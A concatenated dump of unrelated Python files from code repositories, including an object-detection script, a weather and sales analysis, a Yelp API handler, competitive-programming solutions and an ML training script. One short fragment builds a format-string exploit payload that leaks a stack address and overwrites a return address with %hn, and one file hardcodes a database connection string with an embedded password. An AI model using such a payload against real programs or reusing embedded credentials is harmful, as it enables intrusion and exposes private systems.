self.pipeline32_action(df_temp, output_path4)
def batch(self, job, data_dir, output_root, skip_exist=False, filelist=None, file_suffix='', hash_split=None,
n_splits=None, **kargs):
'''
batch processing
Args:
--------------------
job: str
task name, such as resize, rgb2gray
data_dir: str
directory to be processed
output_root: str
output path
skip_exist: bool (default=False)
whether to skip it if the file already exists
num_workers: int (default=1)
multiprocess processing (- 1 represents the use of all cores)
'''
func = {
'workflow1_merge': self.workflow1_merge,
'workflow2_ts': self.workflow2_ts,
'workflow2_merge_ts': self.workflow2_merge_ts,
'workflow31_preprocess': self.workflow31_preprocess,
}[job]
if job in ['workflow2_ts', 'workflow31_preprocess']:
mode = 'file_input' # input is a file
else:
mode = 'dir_input' # input is a folder
data_dir = Path(str(data_dir))
output_root = Path(str(output_root))
output_root.mkdir(parents=True, exist_ok=True)
self._data_dir = data_dir
self._output_dir = output_root
self._is_batch_mode = True
from multiprocessing import Pool
num_workers = self._num_workers
if num_workers < 0:
num_workers = None
tasks = []
if mode == 'file_input': # expand file
if filelist is None:
paths = data_dir.glob(f'**/*{file_suffix}')
paths = list(paths)
else:
paths = Path(filelist).read_text().strip().splitlines()
paths = [data_dir / Path(p) for p in paths]
for path in tqdm(paths):
if path.is_dir():
continue
filename = path.name
if n_splits is None:
pass
else:
hashcode = hash_func(filename)
if hash_split != (hashcode % n_splits):
continue
output_dir = output_root / path.relative_to(data_dir)
output_dir = output_dir.parent / filename
if skip_exist and output_dir.exists():
continue
task = (func, path, output_dir, kargs)
tasks += [task]
elif mode == 'dir_input': # directory to file
if filelist is None:
paths = data_dir.glob(f'**')
paths = list(paths)
else:
paths = Path(filelist).read_text().strip().splitlines()
paths = [data_dir / Path(p) for p in paths]
for path in tqdm(paths):
if not path.is_dir():
continue
dirname = path.name
if n_splits is None:
pass
else:
hashcode = hash_func(dirname)
if hash_split != (hashcode % n_splits):
continue
output_path = output_root / path.relative_to(data_dir)
output_path = output_path.with_suffix(file_suffix)
if skip_exist and output_path.exists():
continue
task = (func, path, output_path, kargs)
tasks += [task]
with Pool(num_workers) as pool:
for _ in tqdm(pool.imap_unordered(func_args_output_helper, tasks), total=len(tasks)):
pass
if __name__ == '__main__':
fire.Fire(DiabetesPipeline)
| rlditr23/RL-DITR | ts/datasets/pipe.py | pipe.py | py | 42,396 | python | en | code | 10 | github-code | 13 |
38390639103 | price=1000000
is_goodcredit=False
is_goodcredit=True
print(is_goodcredit)
if is_goodcredit:
print("Put down price by 10%")
#price=price-0.1*price
downpayment=0.1*price
price-=0.1*price
#print(price)
else:
print("Put down price by 20%")
# price=price-0.2*price
downpayment = 0.1 * price
price -= 0.2 * price
#print(price)
print(f'Price:{price}')
print(f'Down payment:{downpayment}') | NiyatiSinha-yb/PYTHON-Codes-By-Niyati-Sinha | Python Codes by NIYATI SINHA/app18.py | app18.py | py | 421 | python | en | code | 1 | github-code | 13 |
73370907856 | from tensorflow.keras.applications import ResNet50
from tensorflow.keras.applications.resnet import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.applications import imagenet_utils
from imutils.object_detection import non_max_suppression
from detection_helper import sliding_window
from detection_helper import image_pyramid
import numpy as np
import argparse
import imutils
import time
import cv2
#construct the argument parse and parse the argument
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--image', required = True, help = 'path to the input image')
ap.add_argument('-s', '--size', type = str, default = '(200, 150)', help = 'ROI size in pixels')
ap.add_argument('-c', '--min-conf', type = float, default = 0.9, help = 'min probability to filter weak detections')
ap.add_argument('-v', '--visualize', type = int, default = -1, help='whether or not show extra visualization for debugging')
args = vars(ap.parse_args())
#initialize veriables for object detection
WIDTH = 600
PYR_SCALE = 1.5
WIN_STEP = 16
ROI_SIZE = eval(args['size'])
INPUT_SIZE = (224, 224)
#loading network weights
print('Loading network ...')
model = ResNet50(weights = 'imagenet', include_top = True)
#load input image, resize it and then grab its dimensions
orig = cv2.imread(args['image'])
orig = imutils.resize(orig, width = WIDTH)
(H, W) = orig.shape[:2]
#initialize image pyramid
pyramid = image_pyramid(orig, scale = PYR_SCALE, minSize = ROI_SIZE)
#initializing two lists, one for ROIs generated from image pyramid and sliding window, and another to store
#(x, y) coordinates of ROI
rois = []
locs = []
#measuring how much time it takes to loop over image pyramid and sliding window
start = time.time()
#loop over the image pyramid
for image in pyramid:
#determin sclae factor b/w original image dimensions and current layer of pyramid
scale = W / float(image.shape[1])
#for each layer of pyramid loop over sliding window locatons
for (x, y, roiOrig) in sliding_window(image, WIN_STEP, ROI_SIZE):
#scale (x, y) coordinates of ROI w.r.t original image dimension
x = int(x * scale)
y = int(y * scale)
w = int(ROI_SIZE[0] * scale)
h = int(ROI_SIZE[1] * scale)
#take ROI and preprocess it so we can later classify it using keras/Tensorflow
roi = cv2.resize(roiOrig, INPUT_SIZE)
roi = img_to_array(roi)
roi = preprocess_input(roi)
#update list of ROIs and associated coordinates
rois.append(roi)
locs.append((x, y, x + w, y + h))
#check to see if we are visualizing each of sliding windows in pyramid
if args['visualize'] > 0:
#clone original image and draw a bounding box surrounding current region
clone = orig.copy()
cv2.rectangle(clone, (x, y), (x + w, y + h), (0, 255, 0), 2)
#show visualization and current ROI
cv2.imshow('visualization', clone)
cv2.imshow('ROI', roiOrig)
cv2.waitKey(0)
#show how long it took to loop over the image pyramid layers and sliding window location
end = time.time()
print('Looping over Pyramid/Window took {:.5f} seconds'.format(end-start))
#conver the ROIs to a numpy array
rois = np.array(rois, dtype = 'float32')
#classify ROIs using ResNet and show time duration of classification
print('Classifying ROIs...')
start = time.time()
preds = model.predict(rois)
end = time.time()
print('Classifying ROIs took {:.5f} seconds'.format(end - start))
#decode the predictions and initializa a dictionary which maps class labels
#to any ROIs with that label
preds = imagenet_utils.decode_predictions(preds, top = 1)
labels = {}
print('Preds')
print(preds[0])
#loop over the predictions
for (i, p) in enumerate(preds):
#grab prediction information of current ROI
(imagenetID, label, prob) = p[0]
#filter out weak detections by ensuring the predicted probability is greater than
#min probability
if prob >= args['min_conf']:
#grab bounding box associated with prediction and convert coordinates
box = locs[i]
#grab list of predictions for label and add bounding box and probability to list
L = labels.get(label, [])
L.append((box, prob))
labels[label] = L
#loop over the labels for each of detected objects in image
for label in labels.keys():
#clone the original image so we can draw on it
print('Showing results for "{}" '.format(label))
clone = orig.copy()
#loop over all bounding boxes for current label
for (box, prob) in labels[label]:
#draw bounding box on image
(startX, startY, endX, endY) = box
cv2.rectangle(clone, (startX, startY), (endX, endY), (0, 255, 0), 2)
#show results before applying non-maxima supression, then clone image again and show
#after applying non-maxima supression
cv2.imshow('Before', clone)
clone = orig.copy()
#extract bounding boxes and associated prediction probabilities and apply
#non-maxima supression
boxes = np.array([p[0] for p in labels[label]])
proba = np.array([p[1] for p in labels[label]])
boxes = non_max_suppression(boxes, proba)
#loop over all bounding boxes that were kept after applying non-max supression
for (startX, startY, endX, endY) in boxes:
#draw bounding box and label on image
cv2.rectangle(clone, (startX, startY), (endX, endY), (0, 255, 0), 2)
y = startY-10 if startY-10>10 else startY+10
cv2.putText(clone, label, (startX, y), cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 255, 0), 2)
#show output after applying non-maxima supression
cv2.imshow('After', clone)
cv2.waitKey(0)
| BasitJaved/Object-Detection | Object-Detection-using-preTrained-CNN/detect_with_classifier.py | detect_with_classifier.py | py | 5,631 | python | en | code | 0 | github-code | 13 |
43261922442 | def main():
a = sorted(set(ai for ai, _ in AB))
a_dic = {a[i]: i+1 for i in range(len(a))}
b = sorted(set(bi for _, bi in AB))
b_dic = {b[i]: i+1 for i in range(len(b))}
for ai, bi in AB:
print(a_dic[ai], b_dic[bi])
return
if __name__ == '__main__':
H, W, N = map(int, input().split())
AB = [list(map(int, input().split())) for _ in range(N)]
main()
| Shirohi-git/AtCoder | abc211-/abc213_c.py | abc213_c.py | py | 398 | python | en | code | 2 | github-code | 13 |
13960225778 | from sqlalchemy import create_engine, text
db_connection_string = "mysql+pymysql://2tbapi8bc3m9cvx8pnww:pscale_pw_10YnHMfHSznFMKXdkv2uL0FzkGIzEKh9Dx9hyjKJmol@aws.connect.psdb.cloud/sdn_test01?charset=utf8mb4"
engine = create_engine(db_connection_string,
connect_args={"ssl": {
"ssl_ca": "/etc/ssl/cert.pem"
}})
def load_jobs_from_db():
with engine.connect() as conn:
result = conn.execute(text("select * from jobs"))
jobs = []
for row in result.all():
jobs.append(dict(row))
return jobs
| Thipekesh28/SDN_TESTCASE_01 | database.py | database.py | py | 586 | python | en | code | 0 | github-code | 13 |
23111651618 | from src.parsing.DataReader import DataReader
import os
import pickle
import datetime
PRECIPITATION_THRESHOLD = 1.25 # inches of precipitation
def compute_monthly_deviation():
# Load weather data
weather_pickle_path = os.path.join('data', 'serialized', 'weather_data_by_day.pkl')
weather_data = load_weather_data_from_pickle(weather_pickle_path)
precipitation_effects = []
# dict of {datetime.date() : (temp, precip) }
# only includes date where business was open
# Load sales data
reader = DataReader(os.path.join('data', 'dataSet.csv'))
sales_per_month = get_sales_by_month(reader)
sales_by_date = reader.get_sales_by_day()
print(sales_per_month)
# Process each month
for i in range(1, 13):
current_month: int = i
avg_temp = calculate_avg_temp_for_month(current_month, weather_data)
avg_sales_on_normal_day = sales_per_month[current_month - 1]
days_precipitated_in_current_month = [date for date in weather_data.keys()
if date.month == current_month
and weather_data[date][1] > PRECIPITATION_THRESHOLD]
print(days_precipitated_in_current_month)
average_sales_on_precip_days = calculate_sales_on_precip_days(days_precipitated_in_current_month, sales_by_date)
if average_sales_on_precip_days is None:
print(f"No precipitated days for month {current_month}.")
continue
print(f"Average sales on normal day: {avg_sales_on_normal_day}")
print(f"Average sales on precip day: {average_sales_on_precip_days}")
precip_effect = average_sales_on_precip_days / avg_sales_on_normal_day
precip_effect -= 1
precip_effect *= 100
print(f"Precip Affect for {current_month}: {precip_effect:.2f}%")
precipitation_effects.append(precip_effect)
print(precipitation_effects)
avg_precip_effect = calculate_avg_precip_effect(precipitation_effects)
print(f"Avg precip effect: {avg_precip_effect}")
def calculate_avg_precip_effect(effects: list):
total = 0
divisor = len(effects)
for current_effect in effects:
total += abs(current_effect)
return total / divisor
def calculate_sales_on_precip_days(days_precipitated: list, sales_by_date: dict) -> float:
if not days_precipitated:
return None
total = 0
for date in days_precipitated:
if date in sales_by_date:
total += sales_by_date[date]
return total / len(days_precipitated)
def get_sales_by_month(reader: DataReader) -> list:
sales_per_month = []
path = os.path.join("data", "serialized", "avg_sales_per_month.pkl")
if os.path.exists(path):
with open(path, "rb") as f:
sales_per_month = pickle.load(f)
return sales_per_month
else:
for current_month in range(1, 13):
avg_sales_in_in_month = reader.get_avg_sales_per_day_in_month(current_month)
sales_per_month.append(avg_sales_in_in_month)
with open(path, 'wb') as f:
pickle.dump(sales_per_month, f)
return sales_per_month
def calculate_avg_temp_for_month(month: int, weather_data: dict):
total_temp = 0
total_days = 0
for date, weather in weather_data.items():
if date.month == month:
total_temp += weather[0] # Assuming the second element of the tuple is temperature
total_days += 1
if total_days == 0:
return None
avg_temp = total_temp / total_days
return avg_temp
def load_weather_data_from_pickle(weather_pickle_path: str):
weather_data = None
if not os.path.exists(weather_pickle_path):
print(f"File does not exist: {weather_pickle_path}")
raise FileNotFoundError
try:
with open(weather_pickle_path, 'rb') as f:
weather_data = pickle.load(f)
except (pickle.UnpicklingError, EOFError) as e:
print(f"Error while reading the pickle file: {str(e)}")
weather_data = None
return weather_data
if __name__ == "__main__":
compute_monthly_deviation()
| ReeseHatfield/DataDynamics | src/weather_analysis/computation/compute_monthly_deviation.py | compute_monthly_deviation.py | py | 4,166 | python | en | code | 0 | github-code | 13 |
27188594093 | import sys
input = sys.stdin.readline
A, B, C = map(int, input().split())
def find(A, B, C):
if B == 1:
return A % C
else:
s = find(A, B // 2, C)
if B % 2 == 0:
return s * s % C
else:
return s * s * A % C
print(find(A, B, C)) | Nam4o/Algorithm | 백준/Silver/1629. 곱셈/곱셈.py | 곱셈.py | py | 307 | python | en | code | 1 | github-code | 13 |
43261653442 | from heapq import heappop, heappush
def weighted_nearlist(N):
mat = [[-1] * N for _ in range(N)]
for a, b, c in abc:
if mat[a - 1][b - 1] > c or mat[a - 1][b - 1] < 0:
mat[a - 1][b - 1] = c
NEAR = [set() for _ in range(N)]
for i in range(n):
for j in range(n):
if mat[i][j] > 0:
NEAR[i].add((j, mat[i][j]))
return NEAR
def dijkstra(S, N):
DIST = [-1] * N
DIST[S] = 0
que = [(DIST[S], S)]
while que:
d, q = heappop(que)
if DIST[q] < d:
continue
for i, d_qi in near[q]:
tmp = d + d_qi
if DIST[i] > tmp or DIST[i] < 0:
DIST[i] = tmp
heappush(que, (tmp, i))
return DIST
n, m = map(int, input().split())
abc = [list(map(int, input().split())) for _ in range(m)]
near = weighted_nearlist(n)
dist = [dijkstra(i, n) for i in range(n)]
for i in range(n):
ans = -1
for (j, c) in near[i]:
ans += (c + 1) * (j == i)
for j in range(n):
s, t = dist[i][j], dist[j][i]
if (s > 0 and t > 0) and (ans < 0 or s + t < ans):
ans = s + t
print(ans)
| Shirohi-git/AtCoder | abc191-/abc191_e.py | abc191_e.py | py | 1,176 | python | en | code | 2 | github-code | 13 |
10160033295 | import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
df = pd.read_csv("data_tiempo.csv")
# Sin sdc
df_00 = df[df['prob_entrar'] == 0.2]
choque_normal_00 = 0
for i in range(df_00.shape[0]):
for choque in eval(df_00["datos_choques"][df_00.index[i]]):
max_velocity = max(choque[4],choque[1])
if max_velocity > 8:
if (choque[2]!="SDC" and choque[1]==max_velocity) or (choque[6]!="SDC" and choque[4]==max_velocity) :
choque_normal_00+=1
mean_choque_normal_00 = choque_normal_00/df_00.shape[0]
# sdc 0.3
choque_normal_03 = 0
#choque_sdc_03 = 0
df_03 = df[df['prob_entrar'] == 0.4]
for i in range(df_03.shape[0]):
for choque in eval(df_03["datos_choques"][df_03.index[i]]):
max_velocity = max(choque[4],choque[1])
if max_velocity > 8:
if (choque[2]!="SDC" and choque[1]==max_velocity) or (choque[6]!="SDC" and choque[4]==max_velocity) :
choque_normal_03+=1
# for choque in eval(df_03["total_choques_sdc"][df_03.index[i]]):
# max_velocity = max(choque[4],choque[1])
# if max_velocity > 8:
# if (choque[2]=="SDC" and choque[1]==max_velocity) or (choque[6]=="SDC" and choque[4]==max_velocity) :
# choque_sdc_03+=1
mean_choque_normal_03 = choque_normal_03/df_03.shape[0]
#mean_choque_sdc_03 = choque_sdc_03/df_03.shape[0]
# sdc 0.8
choque_normal_08 = 0
#choque_sdc_08 = 0
df_08 = df[df['prob_entrar'] == 0.6]
for i in range(df_08.shape[0]):
for choque in eval(df_08["datos_choques"][df_08.index[i]]):
max_velocity = max(choque[4],choque[1])
if max_velocity > 8:
if (choque[2]!="SDC" and choque[1]==max_velocity) or (choque[6]!="SDC" and choque[4]==max_velocity) :
choque_normal_08+=1
# for choque in eval(df_08["total_choques_sdc"][df_08.index[i]]):
# max_velocity = max(choque[4],choque[1])
# if max_velocity > 8:
# if (choque[2]=="SDC" and choque[1]==max_velocity) or (choque[6]=="SDC" and choque[4]==max_velocity) :
# choque_sdc_08+=1
mean_choque_normal_08 = choque_normal_08/df_08.shape[0]
# mean_choque_sdc_08 = choque_sdc_08/df_08.shape[0]
# Assuming you've calculated the collision counts as shown in your code
# Define the labels and values
labels = ['No SDC', 'SDC 0.3', 'SDC 0.8']
collision_counts_normal = [mean_choque_normal_00, mean_choque_normal_03, mean_choque_normal_08]
# collision_counts_sdc = [0, mean_choque_sdc_03, mean_choque_sdc_08] # Assuming you want to include a bar for SDC 0.0 with value 0
# Set up the positions for the bars
x = range(len(labels))
# Define the width of the bars
width = 0.35
# Create the bar plot
fig, ax = plt.subplots(figsize=(10, 6))
rects1 = ax.bar(x, collision_counts_normal, width, label='Normal')
#rects2 = ax.bar([p + width for p in x], collision_counts_sdc, width, label='SDC')
# Add some text for labels, title, and custom x-axis tick labels, etc.
ax.set_ylabel('Number of Collisions')
ax.set_title('Mean Number of Collisions in 3 Hours with Density 40%')
ax.set_xticks([p + width/2 for p in x])
ax.set_xticklabels(labels)
ax.legend()
# Add value labels on top of the bars
def add_labels(rects):
for rect in rects:
height = rect.get_height()
ax.annotate(f'{height}', xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), textcoords='offset points',
ha='center', va='bottom')
add_labels(rects1)
#add_labels(rects2)
plt.text(0.5, 0.9, 'The colllisions shown happen at velocity > 8', horizontalalignment='center', fontsize=10, transform=ax.transAxes)
plt.savefig('mean_choques_plot_normal.png', dpi=300, bbox_inches='tight')
plt.tight_layout()
plt.show()
| Bony2002/TP_APN | plots/plot_2.py | plot_2.py | py | 3,743 | python | en | code | 0 | github-code | 13 |
34766394040 | import logging
import re
from abc import ABC
from piicatcher.log_mixin import LogMixin
from piicatcher.scanner import ColumnNameScanner, NERScanner, RegexScanner
from piicatcher.piitypes import PiiCategories
class NamedObject(ABC, LogMixin):
def __init__(self, name, include, exclude):
self._name = name
self._pii = set()
self._children = []
self._include_regex = ()
self._exclude_regex = ()
self.set_include_regex(include)
self.set_exclude_regex(exclude)
self.logger.debug(
"Name: %s, include: (%s), exclude: (%s)",
name,
",".join(include),
",".join(exclude),
)
def get_name(self):
return self._name
def has_pii(self):
logging.debug("has_pii {} has {}".format(self, self._pii))
return bool(self._pii)
def has_customer_data(self):
for x in self._pii:
if x[0] == PiiCategories.CUSTOMER_DATA:
return True
return False
def has_customer_usage_data(self):
for x in self._pii:
if x[0] == PiiCategories.CUSTOMER_USAGE_DATA:
return True
return False
def has_authentication_data(self):
for x in self._pii:
if x[0] == PiiCategories.AUTHENTICATION_DATA:
return True
return False
def get_pii_types(self):
return self._pii
def get_pii_types_str(self):
return ",".join(str(x) for x in self._pii)
def get_children(self):
matches = self._children
if len(self._include_regex) > 0:
matched_set = set()
for regex in self._include_regex:
matched_set |= set(
list(
filter(
lambda m: regex.search(m.get_name()) is not None,
self._children,
)
)
)
matches = list(matched_set)
for regex in self._exclude_regex:
matches = list(
filter(lambda m: regex.search(m.get_name()) is None, matches)
)
return matches
def add_child(self, child):
self._children.append(child)
def set_include_regex(self, include):
self._include_regex = [re.compile(exp, re.IGNORECASE) for exp in include]
def set_exclude_regex(self, exclude):
self._exclude_regex = [re.compile(exp, re.IGNORECASE) for exp in exclude]
def scan(self, generator):
self.logger.debug("Scanning %s" % self.get_name())
for child in self.get_children():
child.scan(generator)
self.logger.debug(
"{} has {}".format(child.get_name(), child.get_pii_types())
)
[self._pii.add(p) for p in child.get_pii_types()]
self.logger.debug("%s has %s", self.get_name(), self.get_pii_types_str())
def shallow_scan(self):
self.logger.debug("Scanning %s" % self.get_name())
for child in self.get_children():
child.shallow_scan()
[self._pii.add(p) for p in child.get_pii_types()]
self.logger.debug("%s has %s", self.get_name(), self.get_pii_types_str())
class Database(NamedObject):
def __init__(self, name, include=(), exclude=()):
super(Database, self).__init__(name, include, exclude)
class Schema(NamedObject):
def __init__(self, name, include=(), exclude=()):
super(Schema, self).__init__(name, include, exclude)
def get_dict(self):
dictionary = {"has_pii": self.has_pii(), "name": self._name, "tables": []}
for table in self.get_children():
dictionary["tables"].append(table.get_dict())
return dictionary
class Table(NamedObject):
def __init__(self, schema, name):
super(Table, self).__init__(name, (), ())
self._schema = schema
def scan(self, generator):
self.logger.debug("Scanning table name %s" % self.get_name())
scanners = [RegexScanner(), NERScanner()]
for row in generator(
column_list=self.get_children(), schema_name=self._schema, table_name=self
):
for col, val in zip(self.get_children(), row):
col.scan(val, scanners)
for col in self.get_children():
[self._pii.add(p) for p in col.get_pii_types()]
self.logger.debug("%s has %s", self.get_name(), self.get_pii_types_str())
def get_dict(self):
dictionary = {"has_pii": self.has_pii(), "name": self.get_name(), "columns": []}
for col in self.get_children():
dictionary["columns"].append(col.get_dict())
return dictionary
class Column(NamedObject):
def __init__(self, name):
super(Column, self).__init__(name, (), ())
self.column_scanner = ColumnNameScanner()
def add_pii_type(self, pii):
self._pii.add(pii)
def scan(self, data, scanners):
self.logger.debug("Scanning column name %s" % self.get_name())
if data is not None:
for scanner in scanners:
[self._pii.add(pii) for pii in scanner.scan(data)]
self.logger.debug("%s has %s", self.get_name(), self.get_pii_types_str())
self.shallow_scan()
def shallow_scan(self):
self.logger.debug("Scanning column name %s" % self.get_name())
[self._pii.add(pii) for pii in self.column_scanner.scan(self.get_name())]
def get_dict(self):
return {"pii_types": list(self.get_pii_types()), "name": self.get_name()}
| dm03514/piicatcher | piicatcher/explorer/metadata.py | metadata.py | py | 5,610 | python | en | code | null | github-code | 13 |
18659411184 | import boto3
import json
import yelp_fusion_api
import datetime
#api_key="-5dBnE7ZnbVw1RshcBve1t-Ayg00nnw4PEMj-in726bQM4jODmHTgdUKIEQXzKKgq4hrainJdwniItyA5tZOFg71e9yrEDuqa-tDoxlPpxxzFtQ20Jlr6AcSXRDlW3Yx"
API_HOST = 'https://api.yelp.com'
SEARCH_PATH = '/v3/businesses/search'
#details = {"area": "Manhattan", "time": "8:30", "dining": "dinner", "cuisine": "Indian", "date": "2018-11-09"}
def time_convert(time, date):
date = date.split("-")
year, month, day = int(date[0]), int(date[1]), int(date[2])
time = time.split(":")
hours, minute = int(time[0]), int(time[1])
return int(datetime.datetime(year, month, day, hours, minute, tzinfo=datetime.timezone.utc).timestamp())
def get_info_yelp(details, api_key):
area = details['area']
time = details['time']
dining = details['dining']
cuisine = details['cuisine']
date = details['date']
print("The date is "+str(date))
categories = dining+","+cuisine
converted_time = time_convert(time, date)
print("The converted_time is "+str(converted_time))
url_params = {
'term': cuisine.replace(' ', '+'),
'categories': categories.replace(' ', '+'),
'location': area.replace(' ', '+'),
'open_at': converted_time,
'limit': 5
}
resp2 = yelp_fusion_api.request(API_HOST, SEARCH_PATH, api_key, url_params)
print("The Response from yelp is "+str(resp2))
# logger.info("The Response from yelp is "+str(resp2))
yelp_data_array = []
for i in resp2['businesses']:
name,price,rating,phone_number,address = "NA","NA","NA","NA","NA"
if 'name' in i:
name = i['name']
if 'price' in i:
price = i['price']
if 'rating' in i:
rating = i['rating']
if 'display_phone' in i :
phone_number = i['display_phone']
if 'location' in i:
if 'display_address' in i['location']:
address = ''.join(str(e) for e in i['location']['display_address'])
data = {
"restaurant_name" : name,
"rating" : str(rating),
"price" : price,
"phone" : phone_number,
"address" : address
}
yelp_data_array.append(data)
print("The final yelp data array "+str(yelp_data_array))
return yelp_data_array
| dhruvarora2/Yelper | Backend/aws lambdas/vYelper-sqs_Handler/yelp_handler.py | yelp_handler.py | py | 2,386 | python | en | code | 0 | github-code | 13 |
6343660440 | import bs4
import requests
def getip():
try:
step = '0'
s = requests.get('https://2ip.ua/ua/')
step = '1'
b = bs4.BeautifulSoup(s.text, "html.parser")
step = '2'
a = b.select(" Ваша IP адреса")[0].getText()
step = '3'
a = a.strip()
print(a)
a = '0.0.0.0'
except:
print('Ошибка определения адреса.....'+step)
else:
return a
print("Текущий адрес " + a)
getip() | NSWPro/AVIASTSStatus | myip.py | myip.py | py | 540 | python | ru | code | 0 | github-code | 13 |
18145777119 |
io = start()
exploit = f"%198$p"
io.sendline(exploit)
io.recvuntil(b"Your input is:")
io.recvline()
leaked_rbp = io.recvline(keepends=False)
rip= int(leaked_rbp, 16)-72
buf=b"%058038d%83$hn"+p64(rip)
io.sendline(buf) | aditya70/ss-course | parch/share/2.py | 2.py | py | 217 | python | en | code | 0 | github-code | 13 |
33759115361 | """Helpful functions for de-wedging research."""
import itertools
import logging
import os
import numpy as np
from astropy import constants
def get_coverage(antpos, freqs, bin_edges=None, mode="u"):
"""
Determine the number of baselines that sample each mode.
Unless bin edges for an array of u(vw)-modes is provided, this will count
integer u(vw)-modes that are sampled by the array.
Parameters
----------
antpos: dict
Dictionary mapping antenna numbers to ENU baselines in meters.
freqs: array-like of float
Array of frequencies in GHz.
bin_edges: array-like of float or dict, optional
Bin edges corresponding to gridding of the uvw coordinate system. If
passing a dictionary, keys should come from the set {'u', 'v', 'w'},
and values should be arrays of floats specifying bin edges.
Default is to use unity-length bins, centered on integer values.
mode: str, optional
Whether to bin in u, v, w, or some combination of the three. Default
is to bin in u.
Returns
-------
coverage: dict
Dictionary mapping mode (one of 'u', 'v', 'w') to counts per bin. Keys
are the characters in the ``mode`` string, values are the counts per bin
for each mode.
bin_edges: dict
Dictionary mapping mode to bin edges used for that mode.
Notes
-----
This function counts the number of baselines that sample particular modes
in the uvw-coordinate system in a way that treats u, v, and w independently.
A more careful treatment is needed to count the number of times a given uvw
mode is sampled (i.e. using something like np.histogramdd).
"""
# Make sure bin edges are broadcastable to modes for which to get coverage.
uvw_to_ind = dict(zip('uvw', range(3)))
baselines = get_baselines(antpos)
if bin_edges is not None:
if not isinstance(bin_edges, dict):
try:
bin_edges = np.array(bin_edges).astype(np.float)
if bin_edges.ndim not in (1, 2): raise ValueError
except ValueError:
raise ValueError("Bin edges could not be parsed.")
if bin_edges.ndim == 2:
if bin_edges.shape[0] != len(mode):
raise ValueError(
"2-D arrays of bin edges must have the same number "
"of rows as modes specified. You provided bin edges "
f"with shape {bin_edges.shape}, but want to calculate "
f"coverage for {len(mode)} modes ({set(mode)})."
)
bin_edges = dict(zip(mode, bin_edges))
else:
# We won't be modifying the bin edges, so this is safe.
bin_edges = dict.fromkeys(mode, bin_edges)
else:
if set(bin_edges.keys()) != set(mode):
raise ValueError("bin_edges keys do not match provided modes.")
else:
mode_bounds = {
m: (
min(bl[uvw_to_ind[m]] for bl in baselines.values()),
max(bl[uvw_to_ind[m]] for bl in baselines.values())
)
for m in mode
}
for m, bounds in mode_bounds.items():
if bounds[0] < 0:
lower_bound = bounds[0] * freqs.max()
else:
lower_bound = bounds[0] * freqs.min()
if bounds[1] < 0:
upper_bound = bounds[1] * freqs.min()
else:
upper_bound = bounds[1] * freqs.max()
mode_bounds[m] = (
int(np.floor(lower_bound)) - 1,
int(np.ceil(upper_bound)) + 1
)
# Ensure bin centers are integers from lower_bound to higher_bound.
bin_edges = {m: np.arange(*bounds) + 0.5 for m, bounds in mode_bounds.items()}
coverage = {m: np.zeros(len(bins) - 1) for m, bins in bin_edges.items()}
for bl in baselines.values():
for m, bins in bin_edges.items():
hist = np.histogram(freqs * bl[uvw_to_ind[m]], bins=bins)[0]
# Each baseline can only count once, so don't overcount.
hist = np.min(np.vstack([np.ones(hist.size), hist]), axis=0)
coverage[m] += hist
return coverage, bin_edges
def get_baselines(antpos, autos=False):
"""Construct dictionary mapping antenna pairs to baselines."""
if autos:
combinations = itertools.combinations_with_replacement
else:
combinations = itertools.combinations
return {
pair: np.array(antpos[pair[1]]) - np.array(antpos[pair[0]])
for pair in combinations(antpos.keys(), 2)
}
def save_file(filename, clobber):
"""Determine whether to save a file."""
if not os.path.exists(filename):
return True
else:
if clobber:
logging.info("File exists; clobbering.")
return True
else:
logging.info("File exists; skipping.")
return False
| HERA-Team/hera_sandbox | rfp/scripts/dewedge/utils.py | utils.py | py | 5,062 | python | en | code | 1 | github-code | 13 |
28892475070 | from batchrunner import BatchRunnerMP
from model import BeeEvolutionModel
from agents import *
import argparse
import pickle
def main():
"""
This function should run the model for the global sensitivity anlysis, using the datafile
variable_parameters.pickle.
In that file there are all the set of parameters produced using the saltelli sample.
When clled, this file require to enter the random seed.
"""
parser = argparse.ArgumentParser()
parser.add_argument('--seed', required=True, help='Enter your random seed.')
args = parser.parse_args()
seed = int(args.seed)
# Set the repetitions
replicates = 1
# load preset saltelli sample of parameters
with open("variable_parameters.pickle", "rb") as f:
variable_parameters = pickle.load(f)
batch = BatchRunnerMP(BeeEvolutionModel,
fixed_parameters={"seed":seed},
iterations=replicates,
variable_parameters=variable_parameters,
display_progress=True)
batch.run_all()
# collection of the data
data = batch.get_collector_model()
with open(f"results/data_{seed}.pickle", 'wb') as f:
pickle.dump(data, f)
if __name__ == "__main__":
main()
| AnkurSatya/uva_abm_bumblebee | bumblebee_evolution/batch_run.py | batch_run.py | py | 1,140 | python | en | code | 1 | github-code | 13 |
808942212 | """Trains and evaluates a given model.
Also constructs Kaggle submissions, and save various plots (e.g. confusion
matrix, learning curve) and pickled models to files with a unique id.
"""
import argparse
import numpy as np
import pandas as pd
from keras.utils import to_categorical
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score, log_loss
# from helpers import log_loss
from sklearn.model_selection import cross_val_score, train_test_split, \
StratifiedKFold
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import LinearSVC
from sklearn.preprocessing import MinMaxScaler
from sklearn.calibration import CalibratedClassifierCV
from xgboost import XGBClassifier
import pickle
from helpers import compute_AUC_scores, construct_kaggle_submissions, \
plot_confusion_matrix
parser = argparse.ArgumentParser()
parser.add_argument("--model", "-m", type=str, default="XGBoost", help="Model")
parser.add_argument("--remarks", "-r", type=str, default="", help="Remarks")
parser.add_argument("--balanced", type=bool, default=False,
help="Drop useless features")
parser.add_argument("--neighbors", type=int, default=5,
help="Neighbours in KNN")
# Booleans (False by default)
parser.add_argument("--scale", action='store_true', help="Scale data")
parser.add_argument("--drop", action='store_true',
help="Drop useless features")
parser.add_argument("--final", action='store_true',
help="Put all training data into model fit")
args = parser.parse_args()
train_data = pd.read_csv("data/train_data.csv", header=None).values
test_data = pd.read_csv("data/test_data.csv", header=None).values
train_labels = pd.read_csv("data/train_labels.csv", header=None,
names=['class']).values.ravel()
if args.drop:
train_data_df = pd.read_csv("data/train_data.csv", header=None)
test_data_df = pd.read_csv("data/test_data.csv", header=None)
train_data = train_data_df.drop([0, 216, 217, 218, 219], axis=1).values
test_data = test_data_df.drop([0, 216, 217, 218, 219], axis=1).values
if args.scale:
# Standardize
min_max_scaler = MinMaxScaler(feature_range=(0, 1))
